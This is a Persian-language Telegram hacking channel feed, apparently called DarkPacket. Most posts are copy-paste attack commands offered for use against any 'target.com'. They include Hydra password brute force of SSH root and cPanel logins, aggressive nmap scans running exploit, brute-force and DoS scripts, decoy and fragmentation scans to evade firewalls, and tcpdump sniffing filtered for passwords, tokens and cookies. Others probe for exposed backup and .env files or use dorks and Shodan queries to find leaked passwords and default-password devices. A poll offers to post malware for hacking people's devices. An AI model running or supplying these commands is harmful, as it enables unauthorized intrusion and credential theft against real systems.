حمله به سرور SSH با Hydra (کرک پسورد)
-l root یوزرنیم هدف
-P rockyou.txt لیست پسورد
بعد از چند دقیقه اگر ضعیف باشه پسوردش درمیاد البته به پسوردلیست شما و تارگت بستگی داره، مثلا تارگت روسی سعی کنید پسورد لیست روسی هم تست کنید و...
پسورد لیست دارید؟ با ریاکشن [👍/👎] بگید 🌷
#SSH #Hydra #آموزشی #ℳℴ𝒷𝒾𝓃
hydra -l root -P rockyou.txt ssh://target.com
-l root یوزرنیم هدف
-P rockyou.txt لیست پسورد
بعد از چند دقیقه اگر ضعیف باشه پسوردش درمیاد البته به پسوردلیست شما و تارگت بستگی داره، مثلا تارگت روسی سعی کنید پسورد لیست روسی هم تست کنید و...
پسورد لیست دارید؟ با ریاکشن [👍/👎] بگید 🌷
#SSH #Hydra #آموزشی #ℳℴ𝒷𝒾𝓃
⚡17👎5👍3
DarkPacket
حمله به سرور SSH با Hydra (کرک پسورد) hydra -l root -P rockyou.txt ssh://target.com -l root یوزرنیم هدف -P rockyou.txt لیست پسورد بعد از چند دقیقه اگر ضعیف باشه پسوردش درمیاد البته به پسوردلیست شما و تارگت بستگی داره، مثلا تارگت روسی سعی کنید پسورد لیست…
حمله به CPanel هم مثل قبلی هست:
فقط:
فرم لاگین cPanel رو هدف بگیر
پسوردش درمیاد و کل هاست دستته
مثل قبلی پسورد لیست میخواد.
#cPanel #آموزشی #ℳℴ𝒷𝒾𝓃
hydra -l admin -P rockyou.txt target.com http-post-form "/login/:user=^USER^&pass=^PASS^:F=incorrect"
فقط:
فرم لاگین cPanel رو هدف بگیر
پسوردش درمیاد و کل هاست دستته
مثل قبلی پسورد لیست میخواد.
#cPanel #آموزشی #ℳℴ𝒷𝒾𝓃
⚡16🔥3
DarkPacket
اسکن آسیبپذیری کامل سرور nmap -sV -sC -p- --script=vuln target.com همه پورتها رو اسکن میکنه و آسیبپذیریهای شناختهشده رو نشون میده و اگه سرور قدیمی باشه، اکسپلویتش رو پیدا میکنی... #nmap #آموزشی #ℳℴ𝒷𝒾𝓃
فقط بزنید کد اسکنر گاد زیر رو... 🗿
یه نسخه عالی از کد بالا است.
فقط کافیه target.com رو عوض کنی و کل خط رو بزنی تو ترمینال...
✅ همه پورتهای باز پورتهای باز
✅ آسیبپذیریها (CVE ها، بکدورها، پسورد پیشفرض)
✅ سیستمعامل، دقیق با نسخه
✅ با گزارش کامل
#nmap #آموزشی #ℳℴ𝒷𝒾𝓃
یه نسخه عالی از کد بالا است.
t=target.com; sudo nmap -sS -sV -sC -O -A -p- -T4 --min-rate=10000 --script="vuln,auth,default,discovery,exploit,brute,broadcast,dos" --script-timeout=60s --open --reason -oN /tmp/god_scan_$t.txt $t 2>/dev/null; echo "[+] OPEN PORTS:"; grep "open" /tmp/god_scan_$t.txt; echo; echo "[+] VULNERABILITIES:"; grep -iE "vulnerable|cve-|exploit|brute|weak|auth|bypass|backdoor|default password" /tmp/god_scan_$t.txt; echo; echo "[+] OS DETECTION:"; grep -iE "os:|running:|aggressive|device type" /tmp/god_scan_$t.txt; echo; echo "[+] FULL REPORT SAVED: /tmp/god_scan_$t.txt"
فقط کافیه target.com رو عوض کنی و کل خط رو بزنی تو ترمینال...
✅ همه پورتهای باز پورتهای باز
✅ آسیبپذیریها (CVE ها، بکدورها، پسورد پیشفرض)
✅ سیستمعامل، دقیق با نسخه
✅ با گزارش کامل
#nmap #آموزشی #ℳℴ𝒷𝒾𝓃
⚡15❤2🔥2
Google Dorking حرفهای
#آموزشی #GoogleDorking🔍 Google Dorking: گوگل مثل یک اسکنر آسیبپذیری!
دستورات کاربردی:
site:target.com filetype:pdf
site:target.com intitle:"index of"
inurl:wp-admin
intitle:"phpMyAdmin" inurl:main.php
filetype:sql "INSERT INTO" "password"
inurl:.git/config
site:*.target.com -www🔴 هشدار: اطلاعات لو رفته زیادی پیدا میشود:
"confidential" site:target.com🎯 مرجع کامل: www.exploit-db.com/google-hacking-database
Please open Telegram to view this post
VIEW IN TELEGRAM
Exploit-Db
OffSec’s Exploit Database Archive
The GHDB is an index of search queries (we call them dorks) used to find publicly available information, intended for pentesters and security researchers.
⚡17❤1🔥1
ممنونم از اعتمادتون 🙏
خوشحالم که در کنار شما بهعنوان ادمین فعالیت میکنم. امیدوارم بتونیم محتوای مفید و حرفهای در زمینه هک و امنیت برای اعضای چنل ارائه بدیم. 🤝🔐
#Tyger
خوشحالم که در کنار شما بهعنوان ادمین فعالیت میکنم. امیدوارم بتونیم محتوای مفید و حرفهای در زمینه هک و امنیت برای اعضای چنل ارائه بدیم. 🤝🔐
#Tyger
1⚡16❤3🔥3
🛡️ Blue Team Fact
گاهی یک Login موفق، خودش نشونهی حمله نیست؛
اما اگر همان Login از یک IP غیرمعمول، در ساعت غیرعادی و همراه با تغییرات مشکوک در حساب انجام شود، میتواند یک IOC/Signal مهم برای SOC باشد.
🎯 تحلیلگرهای SOC معمولاً به یک Event منفرد اکتفا نمیکنند؛ Correlation بین چندین Event است که تصویر واقعی حمله را میسازد.
#SOC #BlueTeam #CyberSecurity
#Tyger
گاهی یک Login موفق، خودش نشونهی حمله نیست؛
اما اگر همان Login از یک IP غیرمعمول، در ساعت غیرعادی و همراه با تغییرات مشکوک در حساب انجام شود، میتواند یک IOC/Signal مهم برای SOC باشد.
🎯 تحلیلگرهای SOC معمولاً به یک Event منفرد اکتفا نمیکنند؛ Correlation بین چندین Event است که تصویر واقعی حمله را میسازد.
#SOC #BlueTeam #CyberSecurity
#Tyger
⚡17❤5🔥1
Monospace
#آموزشی #Whois
#آموزشی #Whois
🌐 Whois: ثبتکننده دامنه، تاریخ، DNS
whois target.com
اطلاعات مفید:
- نام و ایمیل ثبتکننده (شاید فیشینگ)
- تاریخ ایجاد و انقضا
- Name Servers
- شماره تلفن (معمولاً مخفی با WHOIS Guard)
⚡️ ابزار آنلاین: whois.domaintools.com
⚡️ در ترمینال: whois target.com
🎯 میزبانی مشترک بودن دامنهها؟ → شاید حمله به هاست!
#آموزشی #Whois
#آموزشی #Whois
⚡17❤2🔥1
Shodan: موتور جستجوی دستگاههای متصل
#آموزشی #Shodan
🌍 Shodan: گوگل برای دستگاههای IoT و سرورها!
دستورات جستجو:
port:21 city:"Tehran"
port:3389 os:"Windows"
"default password" country:IR
cisco country:IR
apache after:2024
🎯 جستجوی پیشرفته:
webcam port:554 country:IR
mysql port:3306 country:IR
🔍 Shodan برای پیدا کردن هدفهای بالقوه عالی است#آموزشی #Shodan
⚡17❤3🔥1
مخفی کردن خودت موقع اسکن (Stealth Mode)
پیدا کردن آسیبپذیریهای خاص با یک خط
گرفتن اطلاعات WHOIS و DNS با یک خط
پیدا کردن سابدامینهای مخفی
کرک SSH سریع با هیدرا
شنود ترافیک شبکه با tcpdump
دور زدن فایروال با فرگمنتکردن
پیدا کردن فایلهای حساس روی سرور
تمام🗿
#nmap #Hydra #SSH #Hacking #آموزشی #ℳℴ𝒷𝒾𝓃
nmap -sS -p- -T2 -D RND:10 --randomize-hosts --spoof-mac 0 -f target.com
پیدا کردن آسیبپذیریهای خاص با یک خط
nmap --script="http-*" -p 80,443 target.com | grep -E "CVE|exploit|vulnerable|http-enum|http-title|http-headers"
گرفتن اطلاعات WHOIS و DNS با یک خط
whois target.com && dig ANY target.com +short && host -a target.com
پیدا کردن سابدامینهای مخفی
for sub in $(cat wordlist.txt); do host $sub.target.com | grep "has address" & done; wait
کرک SSH سریع با هیدرا
hydra -l root -P rockyou.txt -t 4 -w 5 ssh://target.com
شنود ترافیک شبکه با tcpdump
sudo tcpdump -i eth0 -nn -s0 -A 'port 80 or port 443' | grep -iE "password|user|token|cookie"
دور زدن فایروال با فرگمنتکردن
nmap -f --mtu 8 -sS -p 80,443 target.com
پیدا کردن فایلهای حساس روی سرور
for ext in .bak .sql .zip .tar.gz .env .config; do echo "--- $ext ---"; curl -s -o /dev/null -w "%{http_code}" http://target.com/backup$ext; echo; doneتمام🗿
#nmap #Hydra #SSH #Hacking #آموزشی #ℳℴ𝒷𝒾𝓃
⚡18❤2🔥1
جمعآوری اطلاعات از طریق ایمیل
#آموزشی #Email #OSINT
🩸 OSINT از ایمیلها:
۱. بررسی HaveIBeenPwned (هشدار لو رفتن رمز)
۲. جستجوی Hunter.io برای ایمیلهای سازمانی
۳. بررسی LinkedIn برای ساختار ایمیل (first.last@company.com)
۴. Sherlock: پیدا کردن حسابهای کاربری با یک نام کاربری
🎯 ابزار: theHarvester
theHarvester -d target.com -b google,linkedin#آموزشی #Email #OSINT
⚡17❤3
Phishing Frenzy | فریمورک شبیهسازی فیشینگ 🎣
🔺 Phishing Frenzy یک ابزار متنباز برای مدیریت و اجرای کمپینهای فیشینگ در محیطهای تست امنیتی است.
🔺 امکان ساخت صفحات شبیهسازیشده، مدیریت کمپینها و بررسی نتایج را فراهم میکند.
📌 مناسب برای آموزش، آگاهیرسانی و ارزیابی امنیت سازمانها
🔗 GitHub link
#Phishing #CyberSecurity
#Tyger
🔺 Phishing Frenzy یک ابزار متنباز برای مدیریت و اجرای کمپینهای فیشینگ در محیطهای تست امنیتی است.
🔺 امکان ساخت صفحات شبیهسازیشده، مدیریت کمپینها و بررسی نتایج را فراهم میکند.
📌 مناسب برای آموزش، آگاهیرسانی و ارزیابی امنیت سازمانها
🔗 GitHub link
#Phishing #CyberSecurity
#Tyger
🔥4⚡2❤1
فردا کدومو اپلود کنم🐶
Anonymous Poll
35%
بد افزار برای ه.ک دیوایس طرف
56%
اسکریپت مخرب
8%
سورس کد کاربردی
⚡19❤5
🛡️ Blue Team Fact
خیلی از حملات با یک Alert واضح شروع نمیشن؛
گاهی مهاجم با استفاده از ابزارهای قانونی سیستم مثل PowerShell فعالیت میکنه تا رفتار مخربش کمتر جلب توجه کنه.
🎯 به همین دلیل، در SOC فقط دنبال «ابزار مخرب» نیستند؛ رفتار و الگوی اجرای آن اهمیت زیادی دارد.
#SOC #BlueTeam #PowerShell #CyberSecurity #Tyger
خیلی از حملات با یک Alert واضح شروع نمیشن؛
گاهی مهاجم با استفاده از ابزارهای قانونی سیستم مثل PowerShell فعالیت میکنه تا رفتار مخربش کمتر جلب توجه کنه.
🎯 به همین دلیل، در SOC فقط دنبال «ابزار مخرب» نیستند؛ رفتار و الگوی اجرای آن اهمیت زیادی دارد.
#SOC #BlueTeam #PowerShell #CyberSecurity #Tyger
⚡19❤2🔥1
🔴 Red Team Fact
در Red Team، هدف فقط «نفوذ» نیست؛ هدف اینه که مشخص بشه آیا تیم دفاعی میتونه فعالیت مهاجم رو تشخیص بده یا نه. 👀
به همین دلیل، هر عملیات Red Team باید قابل اندازهگیری و مستندسازی باشه تا نقاط ضعف دفاعی مشخص بشن.
#RedTeam #CyberSecurity #Pentest
#Tyger
در Red Team، هدف فقط «نفوذ» نیست؛ هدف اینه که مشخص بشه آیا تیم دفاعی میتونه فعالیت مهاجم رو تشخیص بده یا نه. 👀
به همین دلیل، هر عملیات Red Team باید قابل اندازهگیری و مستندسازی باشه تا نقاط ضعف دفاعی مشخص بشن.
#RedTeam #CyberSecurity #Pentest
#Tyger
⚡18❤2🔥2
🛡️ Security Fact
🦠 Trojan یا «اسب تروجان» خودش یک نوع بدافزار محسوب میشه که معمولاً خودش رو به شکل یک فایل یا برنامهی بهظاهر سالم نشون میده.
مثلاً ممکنه یک فایل ظاهراً معمولی اجرا بشه، اما در پسزمینه فعالیت مخربی انجام بده.
🎯 نکته مهم برای Blue Team:
ظاهر سالم یک فایل، به معنی امن بودنش نیست.
#CyberSecurity #Trojan #BlueTeam #Malware #Tyger
🦠 Trojan یا «اسب تروجان» خودش یک نوع بدافزار محسوب میشه که معمولاً خودش رو به شکل یک فایل یا برنامهی بهظاهر سالم نشون میده.
مثلاً ممکنه یک فایل ظاهراً معمولی اجرا بشه، اما در پسزمینه فعالیت مخربی انجام بده.
🎯 نکته مهم برای Blue Team:
ظاهر سالم یک فایل، به معنی امن بودنش نیست.
#CyberSecurity #Trojan #BlueTeam #Malware #Tyger
⚡15❤5🔥1
🦠 Malware Fact
بدافزارها فقط برای خراب کردن سیستم ساخته نمیشن؛
بعضی از آنها با هدف سرقت اطلاعات، دسترسی غیرمجاز یا حفظ دسترسی طولانیمدت طراحی میشن.
🎯 نکته جالب: بعضی بدافزارها تلاش میکنن فعالیت خودشون رو از دید کاربر و ابزارهای امنیتی مخفی نگه دارن.
#Malware #CyberSecurity #Threat
#Tyger
بدافزارها فقط برای خراب کردن سیستم ساخته نمیشن؛
بعضی از آنها با هدف سرقت اطلاعات، دسترسی غیرمجاز یا حفظ دسترسی طولانیمدت طراحی میشن.
🎯 نکته جالب: بعضی بدافزارها تلاش میکنن فعالیت خودشون رو از دید کاربر و ابزارهای امنیتی مخفی نگه دارن.
#Malware #CyberSecurity #Threat
#Tyger
⚡18❤2👍1
🕶️ Hacker Fact
هکرها همیشه دنبال «هک کردن سیستم» نیستند؛
گاهی ارزشمندترین نقطه ورود، انسان پشت سیستم است. 🎯
مهندسی اجتماعی با سوءاستفاده از اعتماد، عجله یا خطای انسانی میتواند مسیر حمله را باز کند.
🔐 ضعیفترین نقطه یک سیستم، همیشه تکنولوژی نیست.
#Hacker #SocialEngineering #CyberSecurity #Tyger
هکرها همیشه دنبال «هک کردن سیستم» نیستند؛
گاهی ارزشمندترین نقطه ورود، انسان پشت سیستم است. 🎯
مهندسی اجتماعی با سوءاستفاده از اعتماد، عجله یا خطای انسانی میتواند مسیر حمله را باز کند.
🔐 ضعیفترین نقطه یک سیستم، همیشه تکنولوژی نیست.
#Hacker #SocialEngineering #CyberSecurity #Tyger
⚡20❤2🔥1